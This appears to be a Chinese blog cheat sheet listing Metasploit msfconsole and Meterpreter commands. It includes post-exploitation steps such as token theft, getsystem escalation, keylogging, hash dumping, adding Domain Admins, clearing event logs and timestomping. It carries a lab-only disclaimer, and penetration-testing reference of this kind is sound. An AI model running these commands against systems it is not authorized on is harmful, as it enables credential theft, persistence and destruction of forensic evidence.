MSFconsole 命令
命令 | 描述 |
---|---|
show exploits | 显示框架中的所有漏洞。 |
show payloads | 显示框架中的所有有效负载。 |
show auxiliary | 显示框架中的所有辅助模块。 |
search | 在框架中搜索漏洞或模块。 |
info | 加载有关特定漏洞或模块的信息。 |
use | 加载漏洞或模块(例如:使用 windows/smb/psexec)。 |
use | 使用 search 命令后显示的索引号加载漏洞。 |
LHOST | 目标可访问的本地主机的 IP 地址,通常是不在本地网络上时的公共 IP 地址。通常用于反向壳。 |
RHOST | 远程主机或目标。set 函数 设置特定值(例如,LHOST 或 RHOST)。 |
setg | 全局设置特定值(例如,LHOST 或 RHOST)。 |
show options | 显示模块或漏洞利用的可用选项。 |
show targets | 显示漏洞利用支持的平台。 |
set target | 如果您知道操作系统和 Service Pack,请指定特定的目标索引。 |
set payload | 指定要使用的有效负载。 |
set payload | 指定要在 show payloads 命令后使用的有效负载索引号。 |
show advanced | 显示高级选项。 |
set autorunscript migrate -f | 漏洞利用完成后自动迁移到单独的进程。 |
check | 确定目标是否容易受到攻击。 |
exploit | 执行模块或利用并攻击目标。 |
exploit -j | 在作业的上下文中运行漏洞利用。(这将在后台运行漏洞利用。 |
exploit -z | 成功利用后,不要与会话交互。 |
exploit -e | 指定要使用的有效负载编码器(例如:exploit –e shikata_ga_nai)。 |
exploit -h | 显示 exploit 命令的帮助。 |
sessions -l | 列出可用会话(在处理多个 shell 时使用)。 |
sessions -l -v | 列出所有可用会话并显示详细字段,例如利用系统时使用了哪个漏洞。 |
sessions -s script | 在所有 Meterpreter 实时会话上运行特定的 Meterpreter 脚本。 |
sessions -K | 终止所有实时会话。 |
sessions -c | 在所有实时 Meterpreter 会话上执行命令。 |
sessions -u | 将普通的 Win32 shell 升级到 Meterpreter 控制台。 |
db_create | 创建用于数据库驱动攻击的数据库(例如:db_create autopwn)。 |
db_connect | 创建并连接到针对驱动攻击的数据库(例如:db_connect autopwn)。 |
db_nmap | 使用 Nmap 并将结果放在数据库中。(支持正常的 Nmap 语法,例如 –sT –v –P0。 |
db_destroy | 删除当前数据库。 |
db_destroy <user:password@host:port/database> | 使用高级选项删除数据库。 |
help | 打开 Meterpreter 使用帮助。 |
run | 运行基于 Meterpreter 的脚本;有关完整列表,请查看 scripts/meterpreter 目录。 |
sysinfo | 显示受损目标的系统信息。 |
ls | 列出目标上的文件和文件夹。 |
use priv | 加载扩展 Meterpreter 库的权限扩展。 |
ps | 显示所有正在运行的进程以及与每个进程关联的帐户。 |
migrate <proc. id> | 迁移到特定的进程 ID(PID 是从 ps 命令获取的目标进程 ID)。 |
use incognito | 加载隐身功能。(用于在目标计算机上进行令牌窃取和模拟。 |
list_tokens -u | 按用户列出目标上的可用令牌。 |
list_tokens -g | 按组列出目标上的可用令牌。 |
impersonate_token <DOMAIN_NAMEUSERNAME> | 模拟目标上可用的令牌。 |
steal_token <proc. id> | 窃取可用于给定进程的令牌并模拟该令牌。 |
drop_token | 停止模拟当前令牌。 |
getsystem | 尝试通过多个攻击媒介将权限提升为系统级访问。 |
shell | 放入包含所有可用令牌的交互式 shell。 |
execute -f <cmd.exe> -i | 执行 cmd.exe 并与之交互。 |
execute -f <cmd.exe> -i -t | 使用所有可用令牌执行 cmd.exe。 |
execute -f <cmd.exe> -i -H -t | 使用所有可用令牌执行 cmd.exe 并使其成为隐藏进程。 |
rev2self | 恢复到用于破坏目标的原始用户。 |
reg | 在目标的注册表中进行交互、创建、删除、查询、设置等。 |
setdesktop | 根据登录者切换到其他屏幕。 |
screenshot | 截取目标屏幕的屏幕截图。 |
upload | 将文件上传到目标。 |
download | 从目标下载文件。 |
keyscan_start | 开始嗅探远程目标上的击键。 |
keyscan_dump | 转储在目标上捕获的远程密钥。 |
keyscan_stop | 停止嗅探远程目标上的击键。 |
getprivs | 在目标上获得尽可能多的权限。 |
uictl enable <keyboard/mouse> | 控制键盘和/或鼠标。 |
background | 在后台运行您当前的 Meterpreter shell。 |
hashdump | 将所有哈希转储到目标上。使用嗅探器 加载嗅探器模块。 |
sniffer_interfaces | 列出目标上的可用接口。 |
sniffer_dump | 开始嗅探远程目标。 |
sniffer_start | 使用数据包缓冲区的特定范围开始嗅探。 |
sniffer_stats | 从您正在嗅探的界面中获取统计信息。 |
sniffer_stop | 停止嗅探器。 |
add_user | 在远程目标上添加用户。 |
add_group_user <"Domain Admins"> | 将用户名添加到远程目标上的 Domain Administrators 组。 |
clearev | 清除目标计算机上的事件日志。 |
timestomp | 更改文件属性,例如创建日期(反取证措施)。 |
reboot | 重新启动目标计算机。 |
打赏: 支付宝
本人所有文章均为技术分享,均用于防御为目的的记录,所有操作均在实验环境下进行,请勿用于其他用途,否则后果自负。 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
评论已关闭